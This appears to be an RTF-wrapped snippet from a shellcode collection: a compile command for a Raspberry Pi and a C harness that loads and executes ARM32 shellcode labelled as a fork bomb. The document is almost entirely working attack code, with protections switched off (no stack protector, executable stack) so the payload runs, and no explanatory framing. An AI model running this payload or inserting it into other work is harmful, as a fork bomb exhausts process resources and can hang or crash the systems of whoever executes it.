{\rtf1\ansi\ansicpg1252\cocoartf1671\cocoasubrtf600
{\fonttbl\f0\fmodern\fcharset0 Courier;}
{\colortbl;\red255\green255\blue255;\red26\green26\blue26;\red254\green254\blue254;}
{\*\expandedcolortbl;;\cssrgb\c13333\c13333\c13333;\cssrgb\c99608\c99608\c99608;}
\margl1440\margr1440\vieww10800\viewh8400\viewkind0
\deftab720
\pard\pardeftab720\partightenfactor0

\f0\fs20 \cf2 \cb3 \expnd0\expndtw0\kerning0
pi@raspberrypi:~ gcc -fno-stack-protector -z execstack forkbomb_ARM32.c -o forkbomb_ARM32-test\cb1 \
\
\cb3 */\cb1 \
\
\
\cb3 #include<stdio.h>\cb1 \
\cb3 #include<string.h>\cb1 \
\
\cb3 unsigned char shellcode[] = "\\x01\\x30\\x8f\\xe2\\x13\\xff\\x2f\\xe1\\x7f\\x40\\x02\\x27\\x01\\xdf\\xc0\\x46\\xff\\xf7\\xfa\\xff";\cb1 \
\cb3 main()\{\cb1 \
\
\cb3 printf("Shellcode Length:  %d\\n", (int)strlen(shellcode));\cb1 \
\cb3 int (*ret)() = (int(*)())shellcode;\cb1 \
\
\cb3 ret();\cb1 \
\cb3 \}}